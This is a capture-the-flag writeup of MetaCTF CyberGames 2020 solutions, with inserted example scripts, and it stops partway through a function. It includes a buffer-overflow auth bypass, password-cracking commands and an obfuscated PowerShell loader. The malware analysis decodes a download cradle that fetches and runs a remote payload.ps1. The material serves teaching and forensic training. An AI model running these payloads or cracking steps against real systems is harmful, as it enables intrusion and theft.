MetaCTF logo in front of a computer screen
MetaCTF held its annual CyberGames competition on the weekend of October 24th.

MetaCTF CyberGames 2020 Writeup — Last Minute Team Name

This post is a collaborative effort between myself, Connor C., Tim E., and Tilden W. Together, we represented Northeastern University, the University of Cincinnati, the Rochester Institute of Technology, and the University of Virginia. Thanks for a great time, guys!

MetaCTF is an annual cybersecurity Capture The Flag (CTF) event, hosted online this year due to the COVID-19 pandemic. Teams of four from across the world, composed of students and non-students alike, competed in the event for a total prize pool of $5000. The 24-hour event began on October 24 at noon EST. In total, 1,587 teams registered for the event, and 995 teams were able to score points.

Our team was Last Minute Team Name, affiliated with the fictitious Zoom University. By the end of the challenge, we were able to earn a total of 6,750 points. Our score placed us in 36th overall, 24th among the student teams, and in the top 4% of scored teams.

Challenges and Kickoff

This year's challenges included binary exploitation, cryptography, forensics, reconnaissance, reverse engineering, multimedia, and web exploitation. We were required to perform and apply various techniques to find buffer overflows, discover data exfiltration in network traffic, gather open-source intelligence (OSINT), brute-force passwords, analyze and detect malware, and reverse engineer audio files. There were also various trivia competitions and bonus flags released throughout the day.

This report covers the challenges we were able to submit before the competition closed. We listed the challenges per section in the order of the points they were worth. The more points awarded for a challenge, the more difficult it was to solve.

The MetaCTF Cyber Games 2020 Kickoff on October 24th

Our Strategy

Due to its remote nature, my team used a Discord server to communicate during the competition. We used one channel per challenge and organized them per category, from lowest to highest point values. We also used emojis to indicate whether we solved a challenge (✅), had attempted it but not for more than an hour (❔), or had tried it for more than an hour without any progress (❓).

Discord channels showing green checkboxes, a white question mark, or a red question mark
The forensics challenges that I worked on during the competition showing our challenge notation

In each channel, we posted the progress we had made and any details we had discovered. Doing so allowed us to rotate between challenges and quickly pick up where another team member had left off without frequently questioning them. If there was a problem that we could not solve for more than an hour, we marked it and moved on, allowing another team member to attempt it later. Some of the most difficult challenges required input from all four of us before solving the challenge.

Binary Exploitation

The addresses and ports in this section are in Netcat syntax. Use the nc command to connect to each challenge.

Baffling Buffer 0

150 points/solved by 580 teams

While hunting for vulnerabilities in client infrastructure, you discover a strange service located at host1.metaproblems.com 5150. You’ve uncovered the binary and source code of the remote service, which looks somewhat unfinished. The code is written in a very exploitable manner. Can you find out how to make the program give you the flag?

The provided code is written in C.

#include <stdio.h>
#include <stdlib.h>

void vuln() {
    int isAuthenticated = 0;   /* never set by the code below, only by an overflow */
    char buf[48];
    puts("Enter the access code: ");
    gets(buf);                 /* unbounded read: no limit on the number of bytes written into buf */
    puts("TODO: Implement access code checking.");
    if(isAuthenticated) {
        system("/bin/cat flag.txt");
    }
    else {
        puts("Invalid auth!");
    }
}

int main() {
    setbuf(stdout, 0);
    setbuf(stdin, 0);
    setbuf(stderr, 0);
    vuln();
    return 0;
}

Notably, it uses the unsafe function gets(), which reads input with no length limit into a buffer of only 48 bytes. Anything past 48 bytes spills into the neighbouring stack memory, where isAuthenticated lives, so we can perform a simple buffer overflow by inputting more than 48 characters.

A terminal accessing the challenge and inputting too many characters
Inserting “aaaaaa…” into the buffer

The flag is MetaCTF{just_a_little_auth_bypass}.

Cryptography

Crypto Stands For Cryptography

100 points/solved by 932 teams

Welcome to the crypto team! We help consult in a variety of areas around the security department, helping to make sure our company is using proper encryption, data storage, and data transfer mechanisms.

The data security team said they currently use something called Base64 to “encrypt” data. They want to know if that’s a secure way to store sensitive data, and provided a sample of data:

TWV0YUNURntiYXNlNjRfZW5jMGRpbmdfaXNfbjB0X3RoZV9zYW1lX2FzX2VuY3J5cHRpMG4hfQ==

Is it secure? Can you crack it?

CyberChef can be used to convert the Base64 to plaintext:

CyberChef with a Base64 recipe

The flag is MetaCTF{base64_enc0ding_is_n0t_the_same_as_encrypti0n!}.

ROT 26

150 points/solved by 707 teams

We’ve applied some encoding to obfuscate our messages. There’s no way you can figure out the original message now?! I applied the unbreakable ROT 26 algorithm:

g!0{]n`7*+0y~+1|(!y.+0yKM9

dCode is a great website for cracking many different types of codes. Here, it was used to brute-force the “ROT 26” ciphertext by trying every shift over the printable ASCII range.

Screenshot showing the ciphertext input to the Dcode website
Using Dcode with the full ASCII table to see different shifts
Screenshot showing the flag
The shift for ASCII[!-~]+26

The flag is MetaCTF{not_double_rot_13}.
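As an added example (not from the original writeup), here is what the dCode brute force does in code: a rotation over the 94 printable ASCII characters `!` through `~`, the alphabet shown in the screenshots, tried for every possible shift and filtered on the flag prefix. The ciphertext is the one from the challenge; filtering on "MetaCTF{" is my assumption about what to look for.

```python
# Added example: ROT over the printable ASCII range '!'..'~' (94 symbols), the alphabet
# dCode used for this challenge. CIPHERTEXT is the string from the challenge text.
CIPHERTEXT = "g!0{]n`7*+0y~+1|(!y.+0yKM9"
LOW, HIGH = ord("!"), ord("~")
SIZE = HIGH - LOW + 1  # 94 printable characters

def rot_printable(text, shift):
    """Shift every printable character by `shift` positions, wrapping within '!'..'~'.
    Characters outside the range (space, newline) are left untouched."""
    out = []
    for ch in text:
        code = ord(ch)
        if LOW <= code <= HIGH:
            code = LOW + (code - LOW + shift) % SIZE
        out.append(chr(code))
    return "".join(out)

def brute_force(ciphertext, known_prefix="MetaCTF{"):
    """Try all 94 shifts (undoing a +shift encryption) and return the (shift, plaintext)
    pairs whose plaintext starts with the expected flag prefix."""
    hits = []
    for shift in range(SIZE):
        candidate = rot_printable(ciphertext, -shift)
        if candidate.startswith(known_prefix):
            hits.append((shift, candidate))
    return hits

if __name__ == "__main__":
    for shift, plain in brute_force(CIPHERTEXT):
        print(f"shift {shift}: {plain}")
```

Because the rotation is a bijection on the 94-character alphabet, exactly one shift maps the leading `g` to `M`, so the prefix filter returns a single candidate: the "+26" in the dCode caption is the encryption shift, and the script undoes it with -26.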

Welcome to the Obfuscation Games!

175 points/solved by 600 teams

During a recent incident response investigation, we came across this suspicious command executed by an attacker, and we’d like you to analyze it. Malware authors like to obfuscate their payloads to make it harder, but we’re sure you’re up to the task. See if you can figure out what’s happening without even running it!

$s=New-Object IO.MemoryStream(,[Convert]::FromBase64String("H4sIAEFgjl8A/xXMMQrCQBCF4as8FltPIFaCnV3A8jFmn8ngupuYaUS8e5LyL77//vHQcWxLIHWj8Cw2wBd4RWyp2resjMm+pVlOJxzmGWekm8Iu3fU3ScXrwIf1L26C+4CtijukBY3hb/3TCj2Ieh9qAAAA"));IEX (New-Object IO.StreamReader(New-Object IO.Compression.GzipStream($s,[IO.Compression.CompressionMode]::Decompress))).ReadToEnd();

GzipStream is the .NET class that compresses and decompresses data in the gzip format, so the Base64 string passed to FromBase64String is a gzip file. For this challenge, we can use a simple online tool to convert that Base64 string to a .gz file.

Download and unzip the .gz file with any compatible extraction software; inside is a text file that contains the flag MetaCTF{peeling_back_the_flag_one_code_at_a_time}.

The Last Great ZIP File

200 points/solved by 472 teams

Help! I’ve created a zip archive that contains my favorite flag, but I forgot the password to it. Can you help me recover my flag back?

You may need to use another program, such as wget, to download the file if your browser blocks the download. Now to crack the password on the zip file…

Use fcrackzip and the rockyou.txt file (included on Kali) to crack the password of this .zip file.

sudo apt-get install fcrackzip
fcrackzip -u -D -p /usr/share/wordlists/rockyou.txt flag.zip
A screenshot of a terminal running fcrackzip
The fcrackzip command with a rockyou.txt dictionary and the flag.zip file

Now use the password to get the flag:

A screenshot of a terminal running the unzip command
Extracting the flag from the .zip file once the password is known

An image file is extracted:

Bad handwriting of the flag
Somebody likes MS Paint.

The flag is MetaCTF{crack_the_planet}.

Board Meeting Gone Wrong

325 points/solved by 70 teams

I stole this sensitive document that contains some really important board notes. I have a feeling I can get some serious insight on stonks here.

There are a few things I know about the person I stole it from. He likes animals, he likes to speak like he’s a hacker to make himself seem cool, and he was born in 1972. I hope that helps.

Can you help me crack it? I will make sure to share some of the profits.

First, get the hash of the document using Office2John:

python office2john.py Board_Meeting_Notes.docx

Now, create the wordlist to use with Hashcat. Based on the hint, we believe that the password:

  • Contains an animal name in leet
  • Contains the contiguous string “1972”, probably at the start or end
  • May have the first letter capitalized

We found a large list of animal names on GitHub (animals.txt) and translated them into leet with WordListGen, creating an animals-leet.txt file.

A terminal showing the wordlistgen.py command
The WordListGen.py command converting a text file into leet

Then we prepended 1972 to the start of each word in a copy of animals-1337.txt, creating animals-1337-start.txt, and appended 1972 to each word in another copy, creating animals-1337-end.txt. We also created a version of each file in which every line starts with a lowercase letter (the animal list from GitHub used capitalized animal names). All of these actions can be done with the standard Linux awk or sed commands.

Merging the files gives us the dictionary to use for cracking the password:

!!@m@1972
!08$+3r1972
!0ng-3@r3d 0w!1972
!1++!3 P3ngu1n1972
!10n1972
!10nf1$h1972
!12@rd1972
!1g3r1972
!30p@rd1972

Using our dictionary with Hashcat gives us the password: d0lph1n1972
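As an added example, not part of the original writeup and not WordListGen's own code, the following script builds the same kind of dictionary from an animal list: every leet variant of each name, in lowercase and capitalized form, with 1972 prepended or appended. The substitution table is inferred from the nine sample lines above (WordListGen's real table is not shown on this page), so it is an assumption, and the short animal list is a constructed stand-in for animals.txt.

```python
import itertools

# Substitution table inferred from the nine sample lines in the writeup; WordListGen's real
# table is not shown there, so this mapping is an assumption.
LEET = {"a": "@", "b": "8", "e": "3", "i": "1", "l": "!", "o": "0", "s": "$", "t": "+", "z": "2"}
YEAR = "1972"

def leet_variants(word):
    """Every variant in which each substitutable letter is either kept or replaced everywhere
    it occurs: 2**k variants for k distinct substitutable letters. "dolphin" therefore yields
    "d0lph1n" (o and i swapped, l kept) as well as "d0!ph1n" and the untouched word."""
    letters = sorted({c for c in word.lower() if c in LEET})
    for choice in itertools.product((False, True), repeat=len(letters)):
        table = {c: LEET[c] for c, use in zip(letters, choice) if use}
        yield "".join(table.get(c.lower(), c) for c in word)

def case_variants(word):
    """The GitHub list used capitalized names and the hint says the first letter may be
    capitalized, so both forms go into the dictionary."""
    return {word.lower(), word[:1].upper() + word[1:].lower()}

def build_candidates(animals):
    """Full candidate set: leet variants x case variants x 1972 at the start or at the end."""
    candidates = set()
    for animal in animals:
        for name in case_variants(animal.strip()):
            for leet in leet_variants(name):
                candidates.add(YEAR + leet)
                candidates.add(leet + YEAR)
    return candidates

# Constructed stand-in for animals.txt.
ANIMALS = ["Llama", "Lobster", "Lion", "Dolphin", "Little Penguin"]

if __name__ == "__main__":
    # Print one candidate per line so the output can be redirected into a Hashcat wordlist.
    for word in sorted(build_candidates(ANIMALS)):
        print(word)
```

Generating every combination of substitutions is what makes the cracked password reachable: a table that always replaces every `l` with `!` would never produce d0lph1n1972, so the per-letter on/off choice matters more than the size of the animal list.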

A screenshot of a terminal with the Hashcat command and statistics
Running Hashcat with the hash obtained from Office2John

Opening the file gives the flag: MetaCTF{not_all_meetings_are_secret}.

A file containing some irrelevant text and the flag
The Board_Meeting_Notes.docx file

Forensics

I did most of these forensics challenges on SIFT Workstation.

Forensics 101

100 points/solved by 839 teams

Sometimes in forensics we run into files that have odd or unknown file extensions.

In these cases it’s helpful to look at some of the file format signatures to figure out what they are. We use something called “magic bytes” which are the first few bytes of a file.

What is the ASCII representation of the magic bytes for a RAR archive?

“Magic bytes” is another term for a file signature: the sequence of bytes at the beginning of a file that an operating system or application uses to decide how to open it. File signatures are relied on primarily by Linux, since Windows prefers the file extension, the short suffix (typically three characters) after the last dot in a filename. However, some Windows programs and web applications also check the file signature.

File signatures are generally seen as the more secure method for determining the applications that can open a file because they are less easily editable than extensions. They are also useful for steganography and file carving. If an analyst suspects that a file is hiding inside another, and as long as neither file is encrypted or encoded, many forensics programs can identify the hidden file and extract it based on the occurrence of nonmatching file signatures inside of the host file.

Wikipedia keeps a list of file signatures. According to the list, a RAR archive’s file signature should be Rar!…. This is the flag.

Staging in 1…2…3

150 points/solved by 737 teams

The Incident Response (IR) team identified evidence that a Threat Actor accessed a system that contains sensitive company information. The Chief Information Security Officer (CISO) wants to know if any data was accessed or taken.

There was a suspicious file created during the timeframe of Threat Actor activity:

C:\123.tmp. Can you check it out?

If you were to download the provided file, it would appear like this in Windows:

A Windows unidentified file icon
123.tmp viewed in Windows

Since Windows uses the file extension instead of the signature as previously discussed, the OS believes that this is a Windows temporary file. However, we know better. Open the file on Linux.

A Linux RAR file icon
123.tmp viewed in Linux

UNIX-based operating systems will properly read the file type (an archive file) based on the signature. However, let’s run the UNIX file command on it to be sure.

A screenshot of the terminal with the Linux file command identifying a RAR file
`file` command output

More specifically, this is a RAR archive file, the same file format we just analyzed. It can be extracted via the GUI, but I prefer the terminal.

Screenshot of a terminal with the unrar command and the flag
Using `unrar` to extract the file

Now that the correct file type was identified and the contents have been extracted, the flag is clearly visible:

MetaCTF{definitely_n0t_all_0f_y0ur_sensitive_data}

To do this in Windows, change the file extension to .rar. You may need a 3rd party application like 7-Zip or WinRAR to extract it.
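An added example (not from the writeup) that covers both Forensics 101 and this challenge: a small signature table, a function that identifies a file by its magic bytes regardless of its extension, and a check that flags a 123.tmp whose bytes say RAR. The signature values are from the Wikipedia list the writeup cites; the sample bytes are constructed.

```python
import os

# Signatures from the Wikipedia list of file signatures that the writeup cites; all sit at offset 0.
# Each entry: magic bytes, description, extensions that legitimately carry these bytes.
SIGNATURES = [
    (b"Rar!\x1a\x07\x01\x00", "RAR archive (v5+)", (".rar",)),
    (b"Rar!\x1a\x07\x00", "RAR archive (v1.5 to v4)", (".rar",)),
    (b"7z\xbc\xaf\x27\x1c", "7-Zip archive", (".7z",)),
    (b"\x1f\x8b", "gzip compressed data", (".gz", ".tgz")),
    (b"PK\x03\x04", "ZIP archive (also docx/xlsx/pptx/jar)", (".zip", ".docx", ".xlsx", ".pptx", ".jar")),
    (b"\xd0\xcf\x11\xe0\xa1\xb1\x1a\xe1", "OLE compound document (doc/xls/ppt/pub)",
     (".doc", ".xls", ".ppt", ".pub", ".msg")),
    (b"\x89PNG\r\n\x1a\n", "PNG image", (".png",)),
]

def identify(data):
    """Return (description, accepted_extensions) for the first signature matching the start
    of `data`, or None when nothing matches (plain text, unknown formats)."""
    for magic, description, extensions in SIGNATURES:
        if data.startswith(magic):
            return description, extensions
    return None

def ascii_signature(magic):
    """Render a signature the way Forensics 101 asks for it: printable bytes as themselves,
    everything else as '.' (so RAR becomes 'Rar!...')."""
    return "".join(chr(b) if 32 <= b < 127 else "." for b in magic)

def extension_mismatch(filename, data):
    """True when the content is a known format but the extension disagrees, which is exactly
    the C:\\123.tmp situation: Windows sees a temp file, the bytes say RAR archive."""
    match = identify(data)
    if match is None:
        return False
    return os.path.splitext(filename)[1].lower() not in match[1]

def scan_file(path):
    """Read only the first 16 bytes of a file on disk and report what it really is."""
    with open(path, "rb") as f:
        head = f.read(16)
    return identify(head), extension_mismatch(path, head)

# Constructed sample: the opening bytes of a RAR archive handed over as "123.tmp".
SAMPLE_123_TMP = b"Rar!\x1a\x07\x00" + b"\xcf\x90\x73\x00\x00\x0d\x00\x00\x00"

if __name__ == "__main__":
    print(identify(SAMPLE_123_TMP), extension_mismatch("C:\\123.tmp", SAMPLE_123_TMP))
    print(ascii_signature(b"Rar!\x1a\x07\x00"))
```

The two RAR entries differ at byte 6 (0x00 for the classic format, 0x01 for RAR5), so neither is a prefix of the other and table order does not matter for them; for formats where one signature is a prefix of another, the longer one must come first.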

Publish3r

225 points/solved by 430 teams

We believe we found a malicious file on someone’s workstation. Judging by looking at it, the file likely came from a phishing email. Anyways, we’d like you to analyze the sample, so we can see what would have happened if it executed successfully. That way we can hunt for signs of it across the enterprise. Your flag will be the URL that the malware is trying to reach out to! Can you do it? Format: MetaCTF{http://.........}

Note: We’ve put the actual file in an encrypted 7z so your browser doesn’t complain when downloading it (and our site doesn’t get flagged as malware). The password is

metactf

Once again, the file is compressed, this time with 7-Zip. Extract it.

7z x Publish3r.7z

This time, the file extension does match the magic bytes. It is a Microsoft Publisher document.

A screenshot of the terminal with the Linux file command identifying a Publisher document
`file` command output

As this is one of the easier forensics challenges, starting with basic static analysis makes sense. Try running strings on the file.

strings Publish3r.7z > strings.txt

Open the strings.txt file to look for any suspicious data. Among the many strange things in this Publisher document, it most certainly should not be invoking Windows PowerShell. This PowerShell command is encoded, though… I’ll use CyberChef’s Magic function to figure out what it is.

Screenshot of the CyberChef application showing a result snippet with properties Base64 — Valid UTF8 output and entropy 4.09
CyberChef Magic results for the encoded string

Ah! Base64. Now use CyberChef’s Base64 decoder.

Screenshot of the CyberChef application with a URL output
CyberChef Base64 Decode results for the encoded string

The decoded command is:

IEx ((nEW-OBJeCt net.webclient).downloadstring(("http://13.37.10.10:4443/doc/payload.ps1")))

Therefore, the flag is MetaCTF{http://13.37.10.10:4443/doc/payload.ps1}.
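An added example, not from the writeup, that covers both this challenge and Welcome to the Obfuscation Games!: a strings(1)-style carver, Base64 decoding of every long run it finds, a gzip peel when the decoded bytes begin with 1f 8b, and URL extraction from the result. Sample 1 is the PowerShell one-liner quoted in Welcome to the Obfuscation Games!; sample 2 is a constructed stand-in for the Publisher document (the real file is not on the page), so its binary filler and the Base64-encoded copy of the decoded command are assumptions.

```python
import base64
import gzip
import re
import zlib

# Sample 1: the PowerShell one-liner from "Welcome to the Obfuscation Games!" (copied from the page).
STAGE0_B64 = "H4sIAEFgjl8A/xXMMQrCQBCF4as8FltPIFaCnV3A8jFmn8ngupuYaUS8e5LyL77//vHQcWxLIHWj8Cw2wBd4RWyp2resjMm+pVlOJxzmGWekm8Iu3fU3ScXrwIf1L26C+4CtijukBY3hb/3TCj2Ieh9qAAAA"
STAGE0 = ('$s=New-Object IO.MemoryStream(,[Convert]::FromBase64String("' + STAGE0_B64 + '"));'
          'IEX (New-Object IO.StreamReader(New-Object IO.Compression.GzipStream($s,'
          '[IO.Compression.CompressionMode]::Decompress))).ReadToEnd();')

# Sample 2: a constructed stand-in for the Publisher document in "Publish3r": OLE header bytes,
# binary filler, and a Base64 copy of the command the writeup decoded. Not the real .pub file.
DECODED_CMD = 'IEx ((nEW-OBJeCt net.webclient).downloadstring(("http://13.37.10.10:4443/doc/payload.ps1")))'
FAKE_PUB = (b"\xd0\xcf\x11\xe0\xa1\xb1\x1a\xe1" + bytes(range(256)) + b"\x00\x00powershell -e "
            + base64.b64encode(DECODED_CMD.encode()) + b"\x00" * 16)

B64_RUN = re.compile(r"[A-Za-z0-9+/]{32,}={0,2}")
URL = re.compile(r"https?://[^\s\"')]+")

def strings(data, minimum=4):
    """Like strings(1): runs of at least `minimum` printable ASCII bytes."""
    pattern = rb"[\x20-\x7e]{%d,}" % minimum
    return [m.group().decode("ascii") for m in re.finditer(pattern, data)]

def decode_blob(b64):
    """Base64-decode one run and peel a gzip layer if the result carries the 1f 8b magic."""
    raw = base64.b64decode(b64, validate=True)
    if raw.startswith(b"\x1f\x8b"):
        raw = gzip.decompress(raw)
    return raw

def to_text(raw):
    """PowerShell -EncodedCommand payloads are UTF-16LE (every odd byte is NUL for ASCII text);
    anything else is treated as UTF-8."""
    if len(raw) > 1 and raw[1::2].strip(b"\x00") == b"":
        return raw.decode("utf-16le", errors="replace")
    return raw.decode("utf-8", errors="replace")

def peel(data):
    """Carve printable strings, decode every Base64 run in them, and return (decoded_text, urls)
    pairs. Runs that are not valid Base64 or not valid gzip are skipped rather than crashing."""
    results = []
    for s in strings(data):
        for m in B64_RUN.finditer(s):
            try:
                text = to_text(decode_blob(m.group()))
            except (ValueError, OSError, zlib.error):
                continue
            results.append((text, URL.findall(text)))
    return results

if __name__ == "__main__":
    for sample in (STAGE0.encode(), FAKE_PUB):
        for text, urls in peel(sample):
            print(repr(text))
            print("URLs:", urls)
```

The gzip check on the decoded bytes is what lets one loop handle both samples: the Obfuscation Games blob decodes to a gzip stream whose decompressed text is the next stage, while the Publish3r blob decodes straight to the download cradle, and the URL regex then pulls out the same address the CyberChef screenshot shows.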

Open Thermal Exhaust Port

275 points/solved by 416 teams

Our TCP connect Nmap scan found some open ports it seems. We may only have a pcap of the traffic, but I’m sure that won’t be a problem! Can you tell us which ones they are?

The flag will be the sum of the open ports. For example, if ports 25 and 110 were open, the answer would be MetaCTF{135}.

This challenge presents a packet capture (.pcap file) that can be analyzed with Wireshark. There are two IP addresses: 10.0.2.6 and 10.0.2.15. Nmap is a port scanner, so if you know the TCP three-way handshake, you will know that the host sending packets with the SYN (synchronize) flag is the one scanning with Nmap, and the host frequently replying with RST, ACK (reset, acknowledge) is the target.

A screenshot of Wireshark with multiple repeating rows of outgoing SYN traffic and returning RST, ACK traffic
The packet capture showing port scans from 10.0.2.15 to 10.0.2.6

Based on this information, 10.0.2.15 is clearly the attacker and 10.0.2.6 is clearly the target. The target sends RST, ACK when the destination port is closed and SYN, ACK when the port is open, which is how Nmap identifies open ports (assuming there is no firewall or IPS in the path).

Now, we need to look for the ports returning SYN, ACK from the target. By applying a display filter for 10.0.2.6 as a source and packets that have the SYN and ACK bits set in the TCP flags (ip.src == 10.0.2.6 and tcp.flags == 0x12), the results are narrowed down significantly.

A screenshot of Wireshark showing only a few rows of returning SYN, ACK traffic
The packet capture with filters applied

In the Info field, the port on the left is the source port and the port on the right is the destination port. We are focusing on the source port because the traffic we are interested in originates from the target (set as the source in the display filter). Now, ignoring duplicates, we can add up the seven open port numbers to get the flag.

80 (HTTP) + 443 (HTTPS) + 23 (Telnet) + 21 (FTP) + 53 (DNS) + 22 (SSH) + 3128 (Squid Proxy) = 3770

MetaCTF{3770}

I was hoping for 1337, but that might’ve been too obvious of a flag.
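The filter logic above, as an added example (not from the writeup) in Python: a minimal Ethernet/IPv4/TCP parser, the "SYN/ACK from the target" rule, and de-duplication by source port, run over a constructed capture that mirrors the scan (10.0.2.15 probing 10.0.2.6, with the same seven open ports). Real captures would come from a pcap reader; the frames here are built inline, with checksums left at zero, so the script runs offline.

```python
import struct

# TCP flag bits (low byte of the flags field)
SYN, RST, ACK = 0x02, 0x04, 0x10

def build_tcp_frame(src_ip, dst_ip, sport, dport, flags):
    """Build a minimal Ethernet/IPv4/TCP frame. Checksums stay zero: this is constructed
    sample data for the parser, not something to put on the wire."""
    eth = b"\x00" * 12 + b"\x08\x00"                      # dst MAC, src MAC, EtherType IPv4
    tcp = struct.pack("!HHIIBBHHH", sport, dport, 0, 0, 5 << 4, flags, 8192, 0, 0)
    ip = struct.pack("!BBHHHBBH4s4s", 0x45, 0, 20 + len(tcp), 0, 0, 64, 6, 0,
                     bytes(int(o) for o in src_ip.split(".")),
                     bytes(int(o) for o in dst_ip.split(".")))
    return eth + ip + tcp

def parse_tcp_frame(frame):
    """Return (src_ip, dst_ip, sport, dport, flags) for an IPv4/TCP frame, else None."""
    if len(frame) < 34 or frame[12:14] != b"\x08\x00" or frame[23] != 6:
        return None
    ihl = (frame[14] & 0x0F) * 4                           # IPv4 header length in bytes
    tcp = frame[14 + ihl:]
    if len(tcp) < 14:
        return None
    src = ".".join(str(b) for b in frame[26:30])
    dst = ".".join(str(b) for b in frame[30:34])
    sport, dport = struct.unpack("!HH", tcp[:4])
    return src, dst, sport, dport, tcp[13]

def open_ports(frames, target_ip):
    """Equivalent of the Wireshark filter `ip.src == target and tcp.flags == 0x12`:
    a SYN/ACK from the target means its *source* port accepted the connection.
    Nmap may probe a port more than once, so duplicates are dropped."""
    found = []
    for frame in frames:
        rec = parse_tcp_frame(frame)
        if rec is None:
            continue
        src, _dst, sport, _dport, flags = rec
        if src == target_ip and flags == SYN | ACK and sport not in found:
            found.append(sport)
    return sorted(found)

def flag_value(frames, target_ip):
    """The challenge's flag is the sum of the open ports."""
    return sum(open_ports(frames, target_ip))

# Constructed capture: 10.0.2.15 scans 10.0.2.6. Open ports answer SYN/ACK, closed ports
# RST/ACK; port 80 is probed twice to exercise the de-duplication.
SCANNER, TARGET = "10.0.2.15", "10.0.2.6"
OPEN = {21, 22, 23, 53, 80, 443, 3128}
PROBED = [21, 22, 23, 25, 53, 80, 110, 443, 3128, 8080, 80]
CAPTURE = []
for i, port in enumerate(PROBED):
    CAPTURE.append(build_tcp_frame(SCANNER, TARGET, 40000 + i, port, SYN))
    reply = SYN | ACK if port in OPEN else RST | ACK
    CAPTURE.append(build_tcp_frame(TARGET, SCANNER, port, 40000 + i, reply))

if __name__ == "__main__":
    print("open ports:", open_ports(CAPTURE, TARGET))
    print("flag: MetaCTF{%d}" % flag_value(CAPTURE, TARGET))
```

Matching on `flags == SYN | ACK` rather than "ACK bit set" is deliberate: the RST/ACK replies from closed ports also carry ACK, and counting them would add every closed port to the sum.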

Mystery C2

325 points/solved by 157 teams

Our threat intel team detected some malicious Command-and-Control traffic in our network. Can you identify what C2 framework the threat actor is using?

You only have 5 attempts for this one.

This challenge includes another .pcap file. Upload it to PacketTotal to get a high-level picture of what the malware is doing.

A screenshot of the PacketTotal service with the .pcap file analysis displayed
PacketTotal identifying the target IP 8.8.4.4 and the target port 443

The malware sent many packets from 10.0.2.15 (an RFC 1918 private address) to 8.8.4.4, Google’s alternate DNS server, over port 443 (HTTPS). Are there any C2 servers that use DNS over HTTPS and can use Google’s DNS server?

Yes, there is: a quick search reveals that this C2 is most likely goDoH.

Just in Time

375 points/solved by 20 teams (we were the first team to solve!)

Time is running out, and we need your help! Our team has managed to recover a hard drive from a suspect’s computer, and we think there may be information pertaining to the location of an upcoming meet. Unfortunately, the user almost certainly uses an encrypted messaging program when communicating sensitive info.

We’re hoping to recover the address of the meet, which is the flag. Please enter just the street number and road, for example, 123 Easy Street. Also, to make the file download more manageable, we’re giving you just the Users folder with some large (and irrelevant) files deleted. You can download the Users folder here.

Even though the message was purportedly encrypted, there is still the possibility that the operating system or program cached it before it was sent. If the cache hasn’t yet been cleared, it should be possible to recover the message if you know where to look. There are a few locations where the message might still be available:

  • The operating system, because it handles all keyboard input
  • The web browser, if the encrypted chat application is web-based
  • A client application for the chat service that was used to send the message

I will use FTK Imager for this challenge because it provides a simple method for organizing system files and applying forensic techniques.

A screenshot of FTK Imager with the Users folder open
AppData folder displayed in the evidence tree in FTK Imager

There is only one user present on the system (excluding the default accounts), Xiang Zhi. Starting with the operating system, browse to C:\Users\Xiang Zhi\AppData\Local\Microsoft\InputPersonalization\TextHarvester\. This folder would store TextHarvester.dat, a file that adapts to the user's language model and dictionary if Input Personalization is enabled (and contains sensitive keystrokes on occasion). Unfortunately, the folder is empty, so this feature must not be enabled.

Moving on to the browser, C:\Users\Xiang Zhi\AppData\Local\Google shows that Google Chrome is installed. Let’s use Hindsight to learn about Zhi’s web browsing activities.

A screenshot of Excel with the Hindsight .csv file open
Hindsight’s .csv file export displaying visited URLs, site preferences, and downloads

They downloaded Wire-Setup.exe, which is the installer for the Wire encrypted messaging app. Unfortunately, there are no credentials, nor is there an address. We will have to inspect the application data itself.

If we continue looking around in the C:\Users\Xiang Zhi\AppData folder, we find a Wire folder under C:\Users\Xiang Zhi\AppData\Roaming. What files or folders have been edited recently?

A screenshot of FTK Imager displaying the evidence tree expanded to the Wire folder
The Wire IndexedDB folder

There is a database folder a few layers down that has an edit date of September 13th at around 10:00 PM EST. What’s in there?

A screenshot of FTK Imager displaying the file list with last modified dates
The log files in the Wire IndexedDB folder

Check out the log file for anything interesting. We find an address by searching the file for the word “meet,” as the challenge suggests.

FTK Imager viewing a log file with the word “meet” highlighted and an address visible on the same line
Searching for the word “meet” in the log file

Therefore, the flag is MetaCTF{933 English Muffin Way}.

Multimedia

Watermarked

250 points/solved by 146 teams

Sonic watermarks are a security measure used by many different actors in the audio recording industry. Audio engineers sometimes mix them into unfinished tracks in case they are leaked outside of the studio, and developers of VST plugins often manipulate the generated sound to limit those using free trial or cracked versions of their software.

You are an audio engineer working with famous post-lingual rapper Playball Carl, and you’ve been alerted to a leak that just surfaced on SoundCloud. Recover the watermark to find the identity of the leaker.

Studio Version vs. Leaked Version

Actual track ID: wido — 1292Forex

This challenge requires a basic understanding of audio engineering. The player is given two seemingly identical FLAC files, with the same length and the same-looking spectrogram, but one of them contains an inaudible watermark. The spectral analysis doesn’t return any useful information, so we should try to determine whether the watermark is hidden in the audio some other way.

We know that if you play two identical audio tracks simultaneously with one of them inverted, the audio cancels out completely. Let’s use this technique to see whether there is any difference between the tracks. To do this, import both audio tracks into the same project in Audacity, select one of the tracks, apply Effect > Invert to it, and then play:

A screenshot of Audacity with the two audio tracks visualized
Inverting the audio of the two tracks in Audacity

When we hit play, we don’t hear any music but instead what sounds like a text-to-speech program reading off each character in the flag, which comes out to the following:

MetaCTF{p4r7ing_7h3_w4v3z}
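The null test described above, as an added example that is not part of the writeup: two in-memory WAV tracks stand in for the FLAC files, one track is inverted and summed with the other, and whatever survives is the watermark. The 440 Hz tone and the quiet pulse-pattern watermark are constructed data; only the Python standard library is used.

```python
import io
import math
import struct
import wave

RATE = 8000
INT16_MIN, INT16_MAX = -32768, 32767

def write_wav(samples, rate=RATE):
    """16-bit mono PCM into an in-memory WAV; stands in for the two FLAC files."""
    buf = io.BytesIO()
    with wave.open(buf, "wb") as w:
        w.setnchannels(1)
        w.setsampwidth(2)
        w.setframerate(rate)
        w.writeframes(struct.pack("<%dh" % len(samples), *samples))
    return buf.getvalue()

def read_wav(data):
    """Read 16-bit mono PCM back into a list of ints (little-endian, as WAV stores it)."""
    with wave.open(io.BytesIO(data), "rb") as w:
        if w.getnchannels() != 1 or w.getsampwidth() != 2:
            raise ValueError("expected 16-bit mono PCM")
        n = w.getnframes()
        frames = w.readframes(n)
    return list(struct.unpack("<%dh" % n, frames))

def clamp(v):
    return max(INT16_MIN, min(INT16_MAX, v))

def invert(samples):
    """Audacity's Effect > Invert: flip the sign of every sample. -(-32768) does not fit in
    16 bits, so the result is clamped."""
    return [clamp(-s) for s in samples]

def mix(a, b):
    """Playing two tracks together sums them sample by sample (clipped at the 16-bit limits)."""
    return [clamp(x + y) for x, y in zip(a, b)]

def null_test(studio_wav, leaked_wav):
    """Invert the studio track and play it against the leak: everything the two share cancels
    to zero, and what remains is what only the leak contains, i.e. the watermark."""
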